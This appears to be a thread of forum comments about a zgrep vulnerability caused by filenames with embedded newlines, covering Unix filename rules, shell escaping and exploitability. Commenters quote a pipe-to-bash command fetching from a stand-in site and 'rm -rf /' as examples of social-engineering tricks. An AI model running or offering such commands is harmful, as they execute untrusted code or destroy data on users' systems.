while grep is written in C, zgrep is written in posix sh, and the bug was from using sed to escape arguments, and sed being a line-oriented utility that is non-ideal for operating on newline-containing strings (i.e. linux filenames).
Pass is a wrapper script around git and gpg. You can get the functionality of `pass` by running git and gpg commands directly.
Learning git itself is non-intuitive, but the gpg utilities take the learning curve to a whole other level. If you want to make simple use of the gpg utilities, you should plan on setting aside a few full days to learn how they work. Or just use pass, which additionally leverages git for password history.
They can contain any octet except ASCII NUL and /.
That said, pretty much every filesystem's on-disk format has an explicit length field for file names. So in theory, there's nothing stopping them from supporting completely binary filenames - it's the kernel's VFS layer that treats NUL and / as special.
Well, this seems like the sort of error that we've all made when throwing together our own personal scripts, so I guess it is somewhat heartening that the serious Redhat folks would make it too.
My epiphany was using find | xargs and realizing I need -print0 for the former and -0 for the latter to handle special characters. Then I realized all my previous bash scripts were WRONG...
Is there any real use case of having filenames with newlines? Everytime I recall that we have to design programs around that I wonder why it's possible in the first place.
The only invalid character in a path is \0 (which of course would terminate the string immediately), and a particular filename cannot contain /, or be "." or "..". Doesn't even have to be unicode. Literally any other bytes.
EOT or ctrl-D only has significance when typed into a tty. Once it has turned into a character it is as harmless as any other byte value, it doesn't end anything by itself.
Doesn't the article show that newline isn't harmless at all?
Of course EOT doesn't end anything by itself, nor does 0x0a end a line by itself -- all that happens through code that interprets those characters in a particular way, so talking about the "danger" of a character in absence of any code that operates on it is meaningless. In the presence of code, on the other hand, "harmless" in the extreme sense means "there exists no code that will act up when presented this character", which the article shows to be wrong.
I think it is good that it is so flexible, because you never know what kind of data you may want represented on your filesystem. I would rather that there be as few restrictions as possible.
There are cases where you will encounter lots of nasty filenames, especially if you are handling user generated content, like scraping from YouTube or Instagram.
It doesn't directly help UTF8, since all the bytes it uses for encoding non-ASCII have the high bit set.
It might directly help with UTF16, I'm not sure.
But the general idea of "block only a few specific characters (\0 and /) and allow all the rest" does help with UTF8. If the designers said something like "only ASCII letters and number and dashes and underscores" then that would block UTF8, and we might end up with something like URL hostnames, where you use punycode to encode non-ASCII into ASCII.
The point is that unix behaviour is to treat filenames as byte strings, so no particular encoding is mandated by the kernel or by most tools. That made the transition to utf-8 fairly painless.
Not filtering untrusted inputs, and not escaping or handling them correctly is how you write insecure software. Arbitrary input guarantees (unless very strict, then that's indirectly filtering inputs anyways) don't change that.
Why does that make it easier to write insecure software? Which is easier: dealing with bytes, only 2 of which have special meanings (/ and \0) or dealing with a ton of different character classes, each of which you have to think about and code for. The second case happened with URLs, so there's all sorts of weird rules about you can have a ? in this section but not that section, and percent encoding and punycode and stuff like that.
"This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names."
Perhaps I don't get this because I have used Windows most of my life (and DOS before that) but is it valid to have newline characters in a Unix/Linux filename?
I have been using the filename "meeting-notes:10/1 \n Unix & Windows.txt" to test various apps. It tends to expose just how brittle modern computing still is.
It's a bypass against a mitigation for an old trick which worked back in the day where you could watch someone self-nuke themselves off of IRC by convincing them to type rm -rf /
Oh cool! I use nasty-files as a submodule with some of my tests. I can't believe how long I went without without testing against the filename corner cases.
I've found so much software that doesn't properly handle nasty filenames, I think it should be tested for more.
There are no rules about what can be in a filename except they can't contain \0 or / as a matter of practice because the kernel interprets these as end of string and path element separator, respectively.
This doesn't even seem like a legitimate security vulnerability at all, just a generic behavior bug. I'm guessing there are countless bugs like this in a common Linux userland.
I'd argue that the security vulnerability only exist in any program which passes untrusted user input to zgrep, which would be an obviously insecure thing to do.
Unless zgrep claims its safe against untrusted user input? But that would be weird and surprising.
This year, there was a bug reported to zgrep where files with 2 newlines caused it to behave incorrectly. It got a CVE and a front page hacker news post.
I give it very good odds this vulnerability has seen next to zero exploitation in the wild in either of the two cases above.
There aren't, to my knowledge, common programs or setups that would cause this to matter.
This would probably be used for social engineering at best, where the attacker convinces a victim to "hey, git clone my repo, and then run zgrep "bad string" * for some contrived reason"
Someone who's trying to assist someone else on discord or whatever probably won't consider running "zgrep" in an attacker controlled directory dangerous, so they might do it, while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.
> while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.
You’d be surprised. I wrote a Postfix tutorial ages ago and left my real email address in the To: of an example test email. I subsequently got a lot of emails from root@s with the exact same title and body over the years. Too many people copy paste anything labeled as instruction without a second thought.
It sounds like if a web service allowed a user to upload a file with attacker-chosen filename, which it will then run zgrep on, it would be vulnerable.
That's actually the suggested installation mechanism for a lot of software. Most recent I can think of were some AWS cli tools, as delivered from AWS. Height of irresponsibility imo.
Given infinite code, yes. I would imagine exploitability would be rare, but that it’s easier to fix the vulnerability and move on rather than care about whether or not things are affected.
zgrep does create a temporary directory to store the grep search pattern, but only if the pattern is passed via `zgrep -f`, and only if the pattern passed in is not a regular file (i.e. `zgrep -f <(echo "foo") some_file.gz` would create a temporary file with the contents "foo", not with the contents of some_file.gz, and `zgrep -f pattern_file search_file.gz` would not create any temporary file)
I'm sure there's a lot of linux closed source utilities that will break in the same or worse manners. The problem will never be found there.
The issue with finding flaws in source is it takes a massive amount of logical thought about what inputs are possible. For example a new line is valid in a linux file name, but I've never legitimately used one, or do I believe I've even seen one in the last 25 years of using Linux.
> For example a new line is valid in a linux file name, but I've never legitimately used one, or do I believe I've even seen one in the last 25 years of using Linux.
Likewise. I wonder if SELinux or AppArmor or the like allows setting a policy for valid filenames to create. E.g. no newlines, only valid UTF-8, only printable characters.
I've seen them (specifically, filenames generated from values in a "modern" configuration language - json or yaml - that mistakenly had newlines in them.) Fortunately, most of the shell tools involved used `-print0` and the related options anyway (because once you have humans involved, it's the easy way to handle normal spaces in names) and the things that did break, where only "some low-value data processing got skipped" rather than anything harmful.
while grep is written in C, zgrep is written in posix sh, and the bug was from using sed to escape arguments, and sed being a line-oriented utility that is non-ideal for operating on newline-containing strings (i.e. linux filenames).